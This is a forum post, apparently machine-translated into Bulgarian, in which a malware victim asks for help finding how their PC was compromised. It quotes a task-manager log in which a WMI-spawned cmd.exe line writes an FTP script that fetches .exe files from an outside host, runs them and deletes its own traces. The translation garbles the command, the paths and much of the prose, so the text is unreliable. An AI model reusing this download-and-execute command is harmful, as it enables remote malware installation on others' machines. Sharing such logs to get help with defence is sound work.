Помогни ми да намеря дупката в системата

Преди около седмица бях заразен с вирус. Той дойде в самия компютър (не започнах нещо). Очевидно е, че този въпрос е дупка в системата или софтуер. След това поставете отново в системата. Днес за пореден път открих атаката на моя компютър, но навреме, за да се предотврати инфекция. Помогнете да се намери и закърпи дупка в моята система.

Рязане на дневника на AnVir Task Manager:
28.08 00:16:10 wmiprvse.exe 3272 започната от svchost.exe C: \ Windows \ System32 \ WBEM \ wmiprvse.exe (ако приемем, че услугата е започнала "Run сървър обработва DCOM")
28.08 00:16:38 wmiprvse.exe 1740 започната от svchost.exe NT ОРГАН \ SYSTEM C: \ Windows \ System32 \ WBEM \ wmiprvse.exe
28.08 00:16:38 msiexec.exe 1080 започната от services.exe NT ОРГАН \ SYSTEM C: \ Windows \ System32 \ msiexec.exe / V
8.28 00:17:46 cmd.exe 3432 започва от wmiprvse.exe COMP \ администратор C: \ Windows \ System32 \ cmd.exe / г / в MD i2393cd i2393del * / е / и / qecho отворен yBBDD.to. .jajaca.com> Жечо WMI >> Жечо 123 >> Жечо mget * .exe >> Жечо чао >> jFTP.EXE -i -s: jdel Жечо за %% аз в (* .exe) започват %% аз> D.batecho за %% и в (* .exe) направи %% и >> D.batecho дел / F / р% 0% >> D.batD.bat
28.08 00:17:46 ftp.exe 2844 започната от cmd.exe COMP \ администратор C: \ Windows \ System32 \ ftp.exe -i -s: к
(Отворена уста на защитната стена да започне жалби ftp.exe закова и се изтеглят от гнездата 3G модем)
28.08 00:18:16 cmd.exe 3432 прекратено, работил 0:29, 0:00 CPU C: \ Windows \ System32 \ cmd.exe
28.08 00:18:16 ftp.exe 2844 прекратено, работил 0:29, 0:00 CPU C: \ Windows \ System32 \ ftp.exe
28.08 00:18:56 wmiprvse.exe 3272 прекратено, работил 2:45, 0:00 CPU C: \ Windows \ System32 \ WBEM \ wmiprvse.exe

Влезте проверка AVZ: